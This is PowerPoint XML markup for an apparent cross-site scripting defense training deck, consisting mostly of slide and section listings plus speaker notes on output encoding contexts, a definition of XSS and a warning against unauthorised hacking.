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7"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId118"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="416" r:id="rId3"/>
    <p:sldId id="487" r:id="rId4"/>
    <p:sldId id="500" r:id="rId5"/>
    <p:sldId id="316" r:id="rId6"/>
    <p:sldId id="322" r:id="rId7"/>
    <p:sldId id="325" r:id="rId8"/>
    <p:sldId id="417" r:id="rId9"/>
    <p:sldId id="419" r:id="rId10"/>
    <p:sldId id="375" r:id="rId11"/>
    <p:sldId id="330" r:id="rId12"/>
    <p:sldId id="420" r:id="rId13"/>
    <p:sldId id="385" r:id="rId14"/>
    <p:sldId id="383" r:id="rId15"/>
    <p:sldId id="488" r:id="rId16"/>
    <p:sldId id="378" r:id="rId17"/>
    <p:sldId id="489" r:id="rId18"/>
    <p:sldId id="506" r:id="rId19"/>
    <p:sldId id="381" r:id="rId20"/>
    <p:sldId id="406" r:id="rId21"/>
    <p:sldId id="480" r:id="rId22"/>
    <p:sldId id="478" r:id="rId23"/>
    <p:sldId id="481" r:id="rId24"/>
    <p:sldId id="483" r:id="rId25"/>
    <p:sldId id="507" r:id="rId26"/>
    <p:sldId id="389" r:id="rId27"/>
    <p:sldId id="407" r:id="rId28"/>
    <p:sldId id="473" r:id="rId29"/>
    <p:sldId id="485" r:id="rId30"/>
    <p:sldId id="337" r:id="rId31"/>
    <p:sldId id="339" r:id="rId32"/>
    <p:sldId id="390" r:id="rId33"/>
    <p:sldId id="340" r:id="rId34"/>
    <p:sldId id="342" r:id="rId35"/>
    <p:sldId id="392" r:id="rId36"/>
    <p:sldId id="343" r:id="rId37"/>
    <p:sldId id="346" r:id="rId38"/>
    <p:sldId id="348" r:id="rId39"/>
    <p:sldId id="349" r:id="rId40"/>
    <p:sldId id="391" r:id="rId41"/>
    <p:sldId id="345" r:id="rId42"/>
    <p:sldId id="484" r:id="rId43"/>
    <p:sldId id="394" r:id="rId44"/>
    <p:sldId id="350" r:id="rId45"/>
    <p:sldId id="409" r:id="rId46"/>
    <p:sldId id="395" r:id="rId47"/>
    <p:sldId id="396" r:id="rId48"/>
    <p:sldId id="351" r:id="rId49"/>
    <p:sldId id="352" r:id="rId50"/>
    <p:sldId id="410" r:id="rId51"/>
    <p:sldId id="353" r:id="rId52"/>
    <p:sldId id="397" r:id="rId53"/>
    <p:sldId id="412" r:id="rId54"/>
    <p:sldId id="411" r:id="rId55"/>
    <p:sldId id="356" r:id="rId56"/>
    <p:sldId id="357" r:id="rId57"/>
    <p:sldId id="513" r:id="rId58"/>
    <p:sldId id="359" r:id="rId59"/>
    <p:sldId id="398" r:id="rId60"/>
    <p:sldId id="360" r:id="rId61"/>
    <p:sldId id="413" r:id="rId62"/>
    <p:sldId id="361" r:id="rId63"/>
    <p:sldId id="399" r:id="rId64"/>
    <p:sldId id="362" r:id="rId65"/>
    <p:sldId id="363" r:id="rId66"/>
    <p:sldId id="414" r:id="rId67"/>
    <p:sldId id="365" r:id="rId68"/>
    <p:sldId id="469" r:id="rId69"/>
    <p:sldId id="366" r:id="rId70"/>
    <p:sldId id="376" r:id="rId71"/>
    <p:sldId id="401" r:id="rId72"/>
    <p:sldId id="471" r:id="rId73"/>
    <p:sldId id="464" r:id="rId74"/>
    <p:sldId id="427" r:id="rId75"/>
    <p:sldId id="514" r:id="rId76"/>
    <p:sldId id="428" r:id="rId77"/>
    <p:sldId id="430" r:id="rId78"/>
    <p:sldId id="431" r:id="rId79"/>
    <p:sldId id="432" r:id="rId80"/>
    <p:sldId id="433" r:id="rId81"/>
    <p:sldId id="434" r:id="rId82"/>
    <p:sldId id="511" r:id="rId83"/>
    <p:sldId id="436" r:id="rId84"/>
    <p:sldId id="437" r:id="rId85"/>
    <p:sldId id="438" r:id="rId86"/>
    <p:sldId id="439" r:id="rId87"/>
    <p:sldId id="441" r:id="rId88"/>
    <p:sldId id="442" r:id="rId89"/>
    <p:sldId id="443" r:id="rId90"/>
    <p:sldId id="444" r:id="rId91"/>
    <p:sldId id="445" r:id="rId92"/>
    <p:sldId id="446" r:id="rId93"/>
    <p:sldId id="515" r:id="rId94"/>
    <p:sldId id="449" r:id="rId95"/>
    <p:sldId id="450" r:id="rId96"/>
    <p:sldId id="451" r:id="rId97"/>
    <p:sldId id="452" r:id="rId98"/>
    <p:sldId id="453" r:id="rId99"/>
    <p:sldId id="472" r:id="rId100"/>
    <p:sldId id="501" r:id="rId101"/>
    <p:sldId id="504" r:id="rId102"/>
    <p:sldId id="502" r:id="rId103"/>
    <p:sldId id="509" r:id="rId104"/>
    <p:sldId id="503" r:id="rId105"/>
    <p:sldId id="510" r:id="rId106"/>
    <p:sldId id="458" r:id="rId107"/>
    <p:sldId id="474" r:id="rId108"/>
    <p:sldId id="459" r:id="rId109"/>
    <p:sldId id="475" r:id="rId110"/>
    <p:sldId id="476" r:id="rId111"/>
    <p:sldId id="477" r:id="rId112"/>
    <p:sldId id="461" r:id="rId113"/>
    <p:sldId id="466" r:id="rId114"/>
    <p:sldId id="463" r:id="rId115"/>
    <p:sldId id="388" r:id="rId1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AC2844C6-C480-5841-88A6-593A65751A43}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="416"/>
            <p14:sldId id="487"/>
            <p14:sldId id="500"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS Basics" id="{D2F8FDB1-20E4-D94C-8308-75EC9158D706}">
          <p14:sldIdLst>
            <p14:sldId id="316"/>
            <p14:sldId id="322"/>
            <p14:sldId id="325"/>
            <p14:sldId id="417"/>
            <p14:sldId id="419"/>
            <p14:sldId id="375"/>
            <p14:sldId id="330"/>
            <p14:sldId id="420"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Payloads" id="{886040BA-7F7D-7443-80A8-F9A416369BBD}">
          <p14:sldIdLst>
            <p14:sldId id="385"/>
            <p14:sldId id="383"/>
            <p14:sldId id="488"/>
            <p14:sldId id="378"/>
            <p14:sldId id="489"/>
            <p14:sldId id="506"/>
            <p14:sldId id="381"/>
            <p14:sldId id="406"/>
            <p14:sldId id="480"/>
            <p14:sldId id="478"/>
            <p14:sldId id="481"/>
            <p14:sldId id="483"/>
            <p14:sldId id="507"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS Defense Overview" id="{20A07C78-B1C0-2D41-8495-A343CE7C5916}">
          <p14:sldIdLst>
            <p14:sldId id="389"/>
            <p14:sldId id="407"/>
            <p14:sldId id="473"/>
            <p14:sldId id="485"/>
            <p14:sldId id="337"/>
            <p14:sldId id="339"/>
            <p14:sldId id="390"/>
            <p14:sldId id="340"/>
            <p14:sldId id="342"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS Contexts" id="{80BDC7A7-038F-C845-A611-E822B4D8F573}">
          <p14:sldIdLst>
            <p14:sldId id="392"/>
            <p14:sldId id="343"/>
            <p14:sldId id="346"/>
            <p14:sldId id="348"/>
            <p14:sldId id="349"/>
            <p14:sldId id="391"/>
            <p14:sldId id="345"/>
            <p14:sldId id="484"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="HTML Body" id="{4A346717-323B-1741-BAC8-9498CA533A76}">
          <p14:sldIdLst>
            <p14:sldId id="394"/>
            <p14:sldId id="350"/>
            <p14:sldId id="409"/>
            <p14:sldId id="395"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="HTML Attributes" id="{7612E015-4ECE-CF45-8E5F-49B691614DBD}">
          <p14:sldIdLst>
            <p14:sldId id="396"/>
            <p14:sldId id="351"/>
            <p14:sldId id="352"/>
            <p14:sldId id="410"/>
            <p14:sldId id="353"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="URL's" id="{907907D6-C53B-9843-8534-E4E69784BA0D}">
          <p14:sldIdLst>
            <p14:sldId id="397"/>
            <p14:sldId id="412"/>
            <p14:sldId id="411"/>
            <p14:sldId id="356"/>
            <p14:sldId id="357"/>
            <p14:sldId id="513"/>
            <p14:sldId id="359"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Embedded JS" id="{C02E3110-862C-1341-8587-6906A1969960}">
          <p14:sldIdLst>
            <p14:sldId id="398"/>
            <p14:sldId id="360"/>
            <p14:sldId id="413"/>
            <p14:sldId id="361"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CSS contexts" id="{7491643A-E6F9-2941-95FB-8C8C8AB06D05}">
          <p14:sldIdLst>
            <p14:sldId id="399"/>
            <p14:sldId id="362"/>
            <p14:sldId id="363"/>
            <p14:sldId id="414"/>
            <p14:sldId id="365"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Final" id="{21BC324E-A911-3A41-9957-F2B51D9F8C46}">
          <p14:sldIdLst>
            <p14:sldId id="469"/>
            <p14:sldId id="366"/>
            <p14:sldId id="376"/>
            <p14:sldId id="401"/>
            <p14:sldId id="471"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Advanced" id="{D19F73DA-0A9A-E64D-972B-7E11413AED86}">
          <p14:sldIdLst>
            <p14:sldId id="464"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="HTML Sanitization" id="{259F9CAC-DA91-5845-A886-A4C3F55B8151}">
          <p14:sldIdLst>
            <p14:sldId id="427"/>
            <p14:sldId id="514"/>
            <p14:sldId id="428"/>
            <p14:sldId id="430"/>
            <p14:sldId id="431"/>
            <p14:sldId id="432"/>
            <p14:sldId id="433"/>
            <p14:sldId id="434"/>
            <p14:sldId id="511"/>
            <p14:sldId id="436"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="DOMPurify" id="{27EFD00E-2D1B-8C47-A2C6-96B8E8E5CF1A}">
          <p14:sldIdLst>
            <p14:sldId id="437"/>
            <p14:sldId id="438"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="DOM XSS" id="{00CBC1D5-FB46-D64F-B733-375C42DC48DB}">
          <p14:sldIdLst>
            <p14:sldId id="439"/>
            <p14:sldId id="441"/>
            <p14:sldId id="442"/>
            <p14:sldId id="443"/>
            <p14:sldId id="444"/>
            <p14:sldId id="445"/>
            <p14:sldId id="446"/>
            <p14:sldId id="515"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="JSON" id="{785AACA4-E4AA-6F44-90AD-74D50FBFFA4B}">
          <p14:sldIdLst>
            <p14:sldId id="449"/>
            <p14:sldId id="450"/>
            <p14:sldId id="451"/>
            <p14:sldId id="452"/>
            <p14:sldId id="453"/>
            <p14:sldId id="472"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Sandboxing" id="{17B6848F-A3EB-6148-AA4B-63A6A151B286}">
          <p14:sldIdLst>
            <p14:sldId id="501"/>
            <p14:sldId id="504"/>
            <p14:sldId id="502"/>
            <p14:sldId id="509"/>
            <p14:sldId id="503"/>
            <p14:sldId id="510"/>
            <p14:sldId id="458"/>
            <p14:sldId id="474"/>
            <p14:sldId id="459"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="477"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusion" id="{D8D253DE-D195-E444-8929-40652CDF5122}">
          <p14:sldIdLst>
            <p14:sldId id="461"/>
            <p14:sldId id="466"/>
            <p14:sldId id="463"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Testing XSS" id="{43BF4C24-7DB1-CD40-985B-26FA3BD99129}">
          <p14:sldIdLst>
            <p14:sldId id="388"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS Contexts" id="{3A3A9BA1-619B-8A4C-B3CA-A1BE5136A0A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48" autoAdjust="0"/>
    <p:restoredTop sz="94556" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="1080" y="176"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="-80" y="-28964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1" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="2408"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D06E24-6874-6E48-9378-0F8E5B55051D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/18/18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B64C0C-19A6-0041-B01D-26F7CCB81790}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2152956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9B314-7C97-1F4A-A17B-1E3CB7BBC841}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/18/18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A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32247654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npmjs.com/package/xss" TargetMode="External"/><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hyperlink" Target="https://github.com/cure53/DOMPurify"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example.com/item.json"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github.com/yahoo/serialize-javascript"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api.rubyonrails.org/classes/ERB/Util.html#method-c-json_escape"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www.example.com/" TargetMode="External"/><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http://accounts.example.com/" TargetMode="Externa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A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326411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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12594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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269891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8B76F6D8-2420-AA47-8D85-B22542597E23}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2626872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a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"/>
              <a:t> to self: SUCK IT UP JIM</a:t>
            </a:r>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268672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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2509020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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81160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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196417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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2327191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Output Encoding is the process of converting characters that will be interpreted as directives, language elements, or commands to their string-literal equivalents.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining the proper encoding to use for a given output context is incredibly important, and unfortunately... also very complex. Given just an HTML DOM object, there are multiple forms of encoding at play:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML Body - &lt;div&gt; UserInput &lt;/div&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML Attribute - &lt;div attr1="UserInput"&gt; text &lt;/div&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML Comments - &lt;!-- UserInput --&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>URL Paramter - &lt;a href="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http://a.au?p1=UserInput"&gt;foo&lt;/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JavaScript - &lt;script&gt;x='UserInput'&lt;/script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSS - &lt;style&gt;selector { property : UserInput; } &lt;/style&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML tag event handlers - &lt;input type='button' onclick='UserInput'/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JSON - {"image": {"title": " UserInput","id": "1234"}}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226404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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2445338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do not hack without written permission. But if you do not listen to this warning and get arrested, I will at least visit you while you are in jail (if you are allowed visitors).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1223818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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1257111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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1856347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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394902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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81160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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2610933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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2823273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r>
              <a:rPr lang="en-US" sz="1200" b="0" baseline="0"/>
              <a:t>Discuss stand alone JS files and CSS and event binding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577797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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425750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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4131685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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368135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Cross-site scripting attacks, also known as XSS, are a type of injection attack. XSS attacks occur when an attacker uses a trusted web site to send malicious code to an unsuspecting user, generally in the form of a JavaScript or HTML browser-side script. The user’s browser has no way to know that the script should not be trusted, and executes it.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The malicious script can then transmit private data, like cookies or other session information, to the attacker, redirect the victim to web content controlled by the attacker, or perform other malicious operations on the user's machine, all under the guise of the vulnerable site.  These scripts can even rewrite the content of the HTML page.</a:t>
            </a:r>
          </a:p>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3877075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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3557427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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320460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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872095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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22362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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577797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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2998329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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3702708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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
